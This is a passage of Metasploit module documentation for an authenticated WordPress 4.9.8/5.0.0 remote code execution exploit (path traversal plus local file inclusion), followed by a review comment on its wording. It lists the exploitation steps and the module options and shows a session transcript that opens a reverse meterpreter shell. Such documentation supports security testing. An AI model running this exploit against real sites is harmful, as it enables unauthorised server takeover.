Land #11587, add Wordpress core RCE module
@@ -0,0 +1,58 @@
On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
## Exploitation Steps
1. Upload an image containing PHP code
2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
3. Perform the Path Traversal by using the `crop-image` Wordpress function
4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.
When visiting the post created by the attacker it is possible to obtain code execudion.
More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).
## Verification Steps
Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/http/wp_crop_rce`
3. Set the `RHOST`
4. Set `USERNAME` and `PASSWORD`
4. Set `LHOST` and `LPORT`
5. Run the exploit: `run`
6. Confirm you have now a meterpreter session
## Scenarios
### Ubuntu 18.04 running WordPress 4.9.8
```
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux
```
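Review bot: the Verification Steps do not match the scenario that follows them: step 3 says "Set the `RHOST`" while the transcript runs `set rhosts 127.0.0.1`, and two consecutive items are both numbered `4.` ("Set `USERNAME` and `PASSWORD`" and "Set `LHOST` and `LPORT`"), so everything after them is off by one; use `RHOSTS` and renumber the list 1 through 7. The opening sentence, "On WordPress versions 5.0.0 and <= 4.9.8", reads as two unrelated ranges; "WordPress 5.0.0, and 4.9.8 and earlier" states the same affected set unambiguously. "code execudion" should be "code execution", and "Wordpress function" in step 3 of the Exploitation Steps should be "WordPress" to match the rest of the file. Finally, the transcript shows a "Checking crop library" step, two "Uploading payload" / "Image uploaded" rounds and an "Including into theme" step that the text never explains; it would help to say which image library the module expects, why the upload happens twice, and what the module reports when the library check or the template include fails, so a reader can distinguish a patched target from one that merely lacks the required library.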